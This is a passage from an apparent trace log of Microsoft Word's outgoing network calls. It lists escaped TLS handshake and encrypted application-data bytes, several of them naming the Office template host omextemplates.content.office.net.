456. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xefi\\xa0\\x06&\\xe3\\xb4\\x017q\\xbc\\xd2\\xec\\xde\\xe6\\x11s\\x0c\\xa5\\xca\\xf9\\x0b\\xa4\\xc9\\x13|n\\x9a#?\\xfd\\x89\\x7f\\x87 \\xa0\\xfe\\xe3\\x82\\x91=\\xb3\\xe8\\x0e\\xeb\\xc4\\x87o\\xee\\xb0\\xd4\\x15|/~\\x1f\\x896\\x91\\xc0\\xf5'5\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xae)\\xdb\\xdfx\\xd2\\x81\\xf2\\xfe\\x0c\\x95k-\\x83\\x9b\\xee$\\xc6\\xe4\\xe6y\\xc2\\xa4\\xe4ur|qn\\x0c\n\\x8e\\xed\\xa6f\\xc0\\xd1m\\x84n\\xed\\xbf\\x18\\x94\\xb3d\\x08"
457.  
458.  
459. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xbar\\x0c\\xbe\\x15l:\\xde\\x9d\\xe7\\xf1\\xf5\\xe9u7 \\x06\\xd7l\\xf9\\xbb\\xfe\\x8f\\x1am\\x82a\\xfbv\\x16\\xb1e_\\x88\\x97\\xc52\\x967h`\\x0f\\xdb\\x87\\xa0\\x06\\xee\\xd2lxn\\xff\\xbf\r^\\x0c\\xf5\\xbd\\x8e\\x7f\\xbb\\xc4\\xbaz\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000o\\xd2p\\xaa_o\\xee\\xf5\\x817\\xd1y\\xf6\\xc3y;\\x07\\xcd:\\xf7\\xd6\\xf0a\\xd6\\xe1\\xec\\xad\\xf8\\x96\\x8b0o\\xab\\x05\\xfc\\xc627d\\x12\\xde\\x02\\x86m\\x89\\xf6\\x86\\xf9"
460.  
461.  
462. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04?\\xdd\\x84\\x13\\xf5\\x01\\xa5u\\xd2uv\\x96\\xb1 \\xe5\\xa7\\x9e\\x82ng\\x84q9\\xac\\x10\\x9e\\xc4g\\x137\\xbc\\xc4\\x90\\x95\\xbc\\xf1\\xf1(\\xbe\\x18\\xe1\\xd6g\\xa4i\\xf4_\\xe8\\x10\\x91\\xc3\\xbeo\\xa5\\xb4\\x8b\\xf5~\\xe3\\x9f\\x8fw2\\x85\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xf9o!\\xcc\\x82\\xf5\\x07d\\ w\\xbfb\\xeb\\x01\\xe7\\xe6\\xca\\x9e;\\xa4\\xc4\"r\\xa2$y\\xde\\xc74\\xa9\\xb3\\xab\\xb6>\\x93\\xe2\\xb9\\xa7\\x96u\\x90\\xa3\\xa99zk"
463.  
464.  
465. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xf2\\x1a\\xe8\\x81\r\\xd2dr\\xecjs)\\xd7\\x92$\t\\x03\\x8b\\xbeo\\xd5\\x1e\\xd2\\xf0\\x01\\x95\\xfa\\xe4d%do\\x9c\\x8c\\x90\\xb3\\xe17c\\xae'\\x9d^\\x01\\xe4\\xc0\\xca\\xd4p\\x87x\\xadl0\\xea\\xb8\\xf3\\xeap\\xb1\\xb6\\x1e\\xe0\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x1e\\x96g\\x11\\x95\\xbb.c7q\\x9fh\\x9f\\x12\\x0c\\x1c\\x1e\\x05b\\xa7\\xcc\\x14\\x80\\x9d\\xf6\\xf5\\x9ay\\x00qog\\xac\\xbf\\xa8\\x87\\xdb\n\\xbdey\\xfd\\x18-o\\x98"
466.  
467.  
468. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x94\\xcb<\\x9fb\\xf4\\x91\\xa5f\tm\\xcc+\\x1f\\xb3\\xcf\\x01\\xd2j\\x85\\xf4\\xde\\x8a?\\xbf\\x16\\x1ds:+\\x16\\x8em\\xaa?fx\\xa7\\xb5<\\xe0\\xd9\\x84@\\xec\\xe2\\xde\\xf0w\\x9f\\xbdcm_^\\xf2\\xcd\\x92\\x82z\\xe3\\xd0+\\x97\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xc8\\xff\\x02\\xad\\xe5\\x11\\x8bm)s=\\xbf\\x8ezaqpyp\\x0f\\xf16\\x05am*l\\x8c\\xd8\\xe8\\xf2\\xa7\\\\xbb\\xd2p*\\x9c\\xfc\\xf02\\xf8\\x8bs\\xa1\"\\x85\\xfe"
469.  
470.  
471. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xb2\\x9fj|\\xd8x\\xb1\\xf3_w\\x87\\x93\\xa9n<\\xb9\\x1d\\x94.:\\xbc\\x0f\\xb8b\\xef\\x87\\xe5p\\xc8\\xbb\\xbb\\xb0\\xd6\\xfd\\xbb\\x1dh\\x8ex\\xdd\\xc2f\\xd2\\x03\\!\\xee\\8\\xbe\\x81\\xe5\\x8b(\\xf1\\xc4\\xa7\\xdah\\xe6o\\x15\\xb2\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x95\\xc5\\xd9\\x8e\\xf3lr\\x8c\\x0er\\x9d\\xb7\\xa0k\\xe3\\xe7\\xa3\\x932\\xaa\\xc2\\x99s\\xa9\\xeb\r\\xf4\\xb6`j\\x90f:9\\xf1\\xb3\\x82\\xa9:\\xe5\\x05\\xcf\\xed\\xc92\\x0f\\x1cc"
472.  
473.  
474. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010pb\n\\xba\\x82\\xd5\\xe2\\x91u\\x1d\\x02\\x9d\\x81\\x0c\\x0c\\xe1o%\\x84\\x97\\xa3\\xd31a\\xa6\\x15\\xc4\\xf9\\x91j\\xe7bdu\\xd9pwid\\xfd\\xfd\\xdea\\xd0\\xb4\\%\\xca&\\xc8\\xc9g\\\\xa5\\x91\\x80^h\\xbeq\\xb274v\\xf8\\xd4e3e\\x83\\xb7\\x12+=\\xf9+\\x03\r\\x7f\\x87@$\\xf4\\x9bdll\\xe0\\xcf\\x89\\x0cp\\xc1\\xf4\\x8c\\xb39\\x1e!\\x08hkf\\xc6q\\xb9x\\x94aa\\xb0\\xa8f\\xba\\x90\\x1f\\xaeh\\xc3\\xc8\\x01\\xb0\\x80\\x95\\x85\\xaft\\xbd\\xb4\\x96\\x98\\xc3\\xe9\\x98t\\x13q\\xcb\\xe2\\xeb\\xcc\n(c\\x1e\\xb4\\xec\\x03\\xc6?a\\xa5zj,y\\xd2\t|\\xe4 \\xce\\x10\\x02\\xf3q\\xe7c\\xf51\\xa9\\xc0\\\\xd2\\xfd\\xd1\\xb4v\\xf9f6a\\m<!\\xb3\\xa3\\xb4\\xc7\\x9e\\xd8\\xb7>m\\xb3\\xc93$\\x87\\xdb\\xcb1zn\\xb0\\x0b\\xe0\\x17>\\xbb\\xffj:\\x8c~e,\\xb5\\x1b\\xf8r\\xe2?\\x02\\xd1\\xd5i\\xc4\\xb7\\x82n\\x83\\xde\\x8a\\xe2\\xdb\\x01\\xdd\\xb29\\xea\\xd3\\x01at\\x1d\\xcc"
475.  
476.  
477. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x93\\x05\\x08z\\x984\\xac\\xea\\xb1k\\xfa\\x14\\x9c\r\\xd2\\xe2\\x9b\\x85d\\x90gp\\xd3\\xb5\\xb2\\xa5\\x1bn\\xaf\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
478.  
479.  
480. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010f\\xdb)#2\\x98*\\x06s\\x86\\x98q\\xbf\\x94\\x0f\\x03\\xc9\\xb5\\xa0lo\\xd2\\x17\\x80\\xeb\\x9f\\xd7\t\\x1e\\xa9\\xe9\\x0c\\xd34\\xef\\x80\\xa0\\xa5\\xf3^\\xe9\\xab\\xa0 \\x01\\xdb\\xffp\\xb0\\x03\\x91\\xfb\\x0e%\\x99\\x11\\xf1\\xd89\\xf4\\xef\\xf8:7\\x8f!-\\xc8'|\\x9ea\\xef\\x06\\xf1$\\xda\\xd9\\xa1j\\xc4\\xaf\\xedgw\\xbf\\xbb\\x9c1r\\\\xb2-\\xcd\\xed\\xff\\xdb\\x9e_\\xb55y(\\xe8\\xce:\\x0en\\xad\\x82\\xf4\t\\xd9\\x95\\xe1\\x9c6\\xf7\\x8e\\xe1\\x11\\x1b\\x07\\xb4\\xd7\\xbck\\x82-h\\x99\\xda\\x98\\xcay\\x03\\x8d\\x0cm\\xf2r\\x1d\\xdc\\xa4\\xedz(h\\x9c\\xc8o\\x8e\\x9d\\xd3\\x94\\xefmj$*\\xec\\xc0\\xe4\\x17q\\xe4e\\xe9\\xd8\\x8f!\\x02+\\x96\\x0f\\xed)\\x0e\\x9aw\\x83\\xd3\\xfd\\x8a\\\\xf1\\xb2\\x822\\x03d\\x96\\xac\\xd5kw\\xb7k*\\xb5\\xcc\\xcc\\x14\\xa6~m>/7\\xc6\\xedosst\\xafq\\xb2vw\\x87%bg_gubt\\xe0\\xbf\\xec%p-\\xa1\\x02\\xe0t\\x8f\\x99a\\xd8-\\x12f\\x04\\xf8\\xfa\\xf2"
481.  
482.  
483. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xc5\\xb6x\\xf1\\xfd*_\\xb0\\xaf1\\x8bd\\x04\\xa5x\\x8f\\xbc\\x90\\xeb=\\xf5h\\xdc\\xd7\\x1f\\x9b\\xb5@\\x86t\\xfe\\x19hf\\xbb\\x03\\x8f\\x8f\\x85m>z\\xd2\\x86rb\\xd6\\x12\\xd2\\xc3$pp\\xa9\\xc8\\xb1=\\xa8\\x0e\\xe2\\xe7k\\x85c\\xcd\\xf2\\x10\\xb2\\xc84\\xe40\\x95o\\x0f\\x13\\x9de\\x05\\x1c\\x0b0d\\x01l\\x90\\xf5\\xbe\\xfb\\x10\\xf8y\\xfcw\\xcf\\x85\\xee\\x89\\xa8\\xfd-f2\\x0f\\x1f\\xe7*\\xee^\\xf0\\xc6\\xe1i\\x9f\\xcec1r\\xd5\\x9d8\\x83=\\x8ea>f:\\xd3\\xc3\\x189vf\\xb9?\\x90\\x0c\\xdf4\\xb2\\xa2\\x8a\\xbbu\\xc2h\\x89\\x05-\\xe7\\xbbv\\xa5\\\\x0eri@\\xf4\\xb2\\x83\\x10\\x02\\x1e.f\\xb3x0w\\x06\\x83\\xa3\\xbc7i\\x0cg\\xd2\\xb7\\x8c\\xe09\\x06\\x89\\x86\\xc4\\x88w$s\\x1d\\xda\\xb4\\xe2r\\x9e/g\\x97\\xfb\\x9a\\xdbi\\xff\\x05e\\xab:t\\xd1\\x9d\\xbd\\x85\\xf7\\xaat\\x9c\\xfbl\\xc4\\xa4s@?\\x9dmkh\\xdf %r\\x8c~\\xda+\\xdc\\xbe\\xb8\\xae\\x8e>\\xae\\x87v\\x03\\xbb"
484.  
485.  
486. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xa3\\x05nx\\xb7\\x1b\\x1c\\xe2(\\x9f\\x87\\xf8\\x92|\\xab\\x8al\\xc5m\\xb5\\xf1\\x84^\\x8f\\x05\\x1f\\x04\\xc4\\xdcr\\xda\\x815\\x96\\xdc\\x99\\x1c\\x11\\xe4\\xf2\\xbfx\\xd6\\xe0\\x88`\\x1d=\\x86\\x99e8<\\xc9\\xabn\\x02\\xbe\\xf1\\x01h2\\xf7\\xa3x\\xe2\\xf8mws%\r\\xc9'5\\xb06\\x19\\xb5\\xe6\\x82\\xeen\\xff\\xb3\\xf7\\xc9it\\x06f\\xdf\\x9d0h\\xcb\\xd02\\xe6\\xeay\\x06\\x18y\\x8c\\xb3e8\\x8a\\x1c\\xbb\\xdb\\x06f\\xc59\\xaa\\x8bh\\x7f\\xc7!\\x8f\\xffd\\xbe\\xf1\\x0f\\x7fs\r\\xac\\x97o\\x8f\\xcegw4md\\x88&\\xb4m\\x8fyi\\xb1\\x9d\\xe4j\\x94\\x8b\\x85q\\x86\\x00\\x98-\\xde\\xbb\\xbb~f\\x86dg\\xcadi\\xefhz\nq\\x8a\\x99*a\\xd3e\\xd8\\xff\\x98\\x1f\\x98\\xce\\xb9\\xcb\\x0c\\xe6\\x8c\\xc7\\x1equ\\xd4\\\\xfdr\\x01+\\xa4\\xbft\\xc1\\xc6\\xda\\xda\\x8b$\\x7f\\x9a\\xf1,\\xee\\x1d\\x95\\x06\\xa8\\x1e\\xb7\\x8fc\\x1ay,\\xf8v\\xf1o\\x94\\xf5y\\xb9\\x10\\\\xbf\\x0c3\\xf3\\x08b9\\xf4\\x16v"
487.  
488.  
489. "http_request": "winword.exe_WSASend_`\\xa4i\\x0f\\x08~e\\x0fm\\x1a\\xd4 b\\xe4l\\x91\\x9cm\\xf5\\xf0\\xee\\x9e\\xb8e\\x8e\\xec\\x1dl\\xd6\\xe3\\xc3\n\\xd5\\xad\\xfc\\x86:sav\\xce\\x11\\xedl\\x02\\x9d\\xcc\\xd4\\xe8'\\xbb\\xff\\xd8\\xe7\\x9d\\x1f\\x89\\x97\\xe6?\\xacwu\\xcb%\\xac\\x01\\xdfd\\x98b'\\xb2pw\\xd2\\xad\\x88\\x9e\\xb8\\xfb\\x14\\xf4\\x92\\x02\\x1bu9\\xfdp\\xaf\\xcf\\x95\\x92m\\x94\\x89\\x1e\\xde\\xef\\x08(\\xd5\\x9d\\xd0\\xd3\\xd2ayp\\xc7\\xd5?k\\xc0\\xa2\\xc7\\x93?\\x07\\xef*\\xab\\xcb\\xe0\\x95\\\\xe4(!=\\xb4\\xdf\\x15@\\xd3!;\\xd9ec\\x8e*\\xcd\\xb5\\xc7\\xb1\\xbcwg1b!\\x9f\\xffr\\xd5\\x9fg\\xd6o>\\xec=\\xa0\\xa8h6i\\xe2j\\x85\\xed\\xb6\\x04c\\xa1\\x12\\xb6\\xaa\\xa7\\x19j\\xca\\x7f\\xb0\\xf7\\xd3h\\xe7<w\\x1f\\x1a\\xac\\xa5\\x96\\x0e\\x0e\\x11\\x04\\x96\\xc0\\xd8\\x87\\x87\\x1c\\x0f\\x8c\\x05\\xd7\\x8d\\x81\\x006\\xa5\\xf3h\\xa1p|.s\\x02-1\"\\x83\\xb3~\\xb8\\xc2\\xad\\xe9\\xcb\\xa16n\\xc7\\xd9\\xcb\\x9f\\xeb )8+p\\x05?\\xb1\\xa57"
490.  
491.  
492. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x93\\x97e\\xad\\xb7cgm\\x16g:%\\xb8\\xa8\\x0e\\xd4\\x97\\x0fl\\x10r\\x1d\\x84~\\xeeta^\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
493.  
494.  
495. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x93\\x93\\x8a\\x90\t=\\xa9\\xc7\\x90\\xef\\xf7\\x03\\x10\\xdb\\xa5s\\x0b\\xc5/+\\xa9\\xd2\\x87_-\"ew\\xcc\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
496.  
497.  
498. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x93\\xd7\\x80.vi\\xbaoa\\x81\\xf44\\xb8m\\xa4\\xb46\\x89\\x0b\\xc5a\\xda\\xe6\\xb7\\xc5\\xa6'\\xcdd\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
499.  
500.  
501. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x93\\xf7\n*a\\xa1\\xa4\\xcc\\x0e\\xbc\ns\\x032\\xc2\\xd2?\\x16g\\xff\\x1b\\xa9\\xc1\\xee\\xd3\\xe0\\xc9\\xf6\\x81\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
502.  
503.  
504. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x93\\x0eg7c\\xce\\xfaz\\xf9\\x9d0\\x89s\\xf6\\xb4\\xcf\\xdb\\xf68v\\xa9\\x9b`s_*\\xb0\\xf7\\xeb\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
505.  
506.  
507. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94\\xc0*\\xfe\\xc3\\xe6\\x88t\\x06f\\xfc!9\\x97\\xf5\\x84\\x04\\xcd\\xf2\\xe3b\"\\xdc!\\x0c\\x12\\xd8\\x18p\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
508.  
509.  
510. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94\\xfc\\xec\\xd4\\x18\\xb8\\xb0\\xdd\\x81\\xb1\\xcc\\x8a\\x1b\\xaak\\xab\\x85\\xac@(\\xc5\\xbc,\\\\xad~f\\xfc\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
511.  
512.  
513. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94\\xa8.\\xe3\\x8d\\x1c)\\x1b\\xf1#\\xd3\\x8f\t\\xb3c\\xd8\\xe7\\xd18uf\\xe9ba\\x14a\\x8bm\\xad\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
514.  
515.  
516. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94\\xd7\\xca\\xf3;\\xfby>\\x95\\x8b\\xda\\xbf\\xd4'!\\xfd-\\x16\\x81=\\xa8\\x96paw\\x15_\\xb9j\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
517.  
518.  
519. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94fh\\x8e\\x80\\xb0\\xbe\\xba0t\\xa4=\\x19\\x8f\\xe50v\\x9a\\xa2\\x0e\\xaa\\xf0\\x89c\\xf9,\\x1by\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
520.  
521.  
522. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94\\xf8c\\xd0\\xb9h5\\xc5)\\xab\\x93\\xb4y\\xefx\nvx\nm\\xa79+\n\\xa9\\x81\\xcf\\x1a\\xcb\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
523.  
524.  
525. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94\\x10\\xabj\\xd9\\x17\\x1d6(\\xc4=;\\xca\\x87\tc\\xd3\\xfc+\\x80\\x977\\xb9\\xbfcf\\xfc&a\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
526.  
527.  
528. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94&0i\\xd5b\\x89\\x1f3\\xb6\\xc9\\xe3\\xf0\\x8e6\\xf1\\xd5\\xb0\\xe9\\xdcc\\xe3p\\xadg\\x05tt\\xbc\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
529.  
530.  
531. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94\\x03\\xaa\\xf5\\xc8\\xe7\\x87\\x0es\\xdb\\x9d\\xc1:\\x92\\xb9~d\\x02\\xa3\\x89\r\\xffal\\xa6\\x06=\\xb2\\x03\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
532.  
533.  
534. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94f\\xf6\\xbe\\xbfl\\x1ag/\\xb4l\\xb0%c\\x894q\\xff\\x16\\xc8\\xf6p\\xb1x`j\\x1by\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
535.  
536.  
537. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94\\xcf\\x19%:\\xc6\\x8b3\\xd5\\xc4p\\x04q\\xe1?\\x08t\no\\x9e+\\xb7\\xf7\\xd2h\\xbb\\x15\\xba\\xbe\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
538.  
539.  
540. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x91\\xc1\\xd4\\xc7\\x02tx\\x81\\xa7<\\xb69\\x13\\xf1)l\\x94\\xac\\x96\\xb6\\x85\\xda\\x05\\x9c\\x7f\\x8c\\xc8\\xba\\x15\\x9d\\x84\\xdf\\xab\\xee\\xaf\\xa1\\xa4\\x80\\x10\r\\xb1\\xf1\\xa8\\x01\\xc57\\xfc\\xd2ni\\xb1\\x02\\xe9y\\x17\\x01\\xcdrx\\xda\\xf2\\x06\\x02\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x846\\x00\\xd7\\x0e\\xcb\\x89\\xb8m\\x83\\x07+\\xe0\\xbd\\xfc\\x1c,i\\x1f\\xa1\\x17x\\xdd\\x07b\\xff\\xf4\\xfd\\xb8\\xde\\xff\\x02\\xee\\xbf\\xfa\\xae\n?\\xa2^\\x81\\xd5\\xc7\\xaclqt\\xaa"
541.  
542.  
543. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xabd\\x18\\xaf\\xac\\xb5\\xa0k\\x01\\x97\\xd0\\xaem\\x84\\xa8\\xa6\\xc8s0\\xb5\\x9e\\xce\\xd0-)\\xbd\\x8c\\xeaqgj)\\x8d\\xba~*u\\xf4\\xc40\\x18\\xba\\x8e \\xa4py\\xbai\\x16\\xa5\\xb7<\\xfae\\x8a\\x04\\xd0d'8\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000(\\x1b\\x87=\\xaav\\xd3\\xf6\\xc6d\\xc2\r\\x82\\x00\\x8d(\\xa2\\xfc\\xbb\\x12\\x0f\\xd2\\xf5\\x80a\\xf6\\x0c\\xd96\\xb3\\xb0\\xdd\\xd2\\x88\\xd3t*\\xf3\\x0c\r\\x92\\x8a\\x0b\\xa5\\xa6\\xe3\\xba\\x88"
544.  
545.  
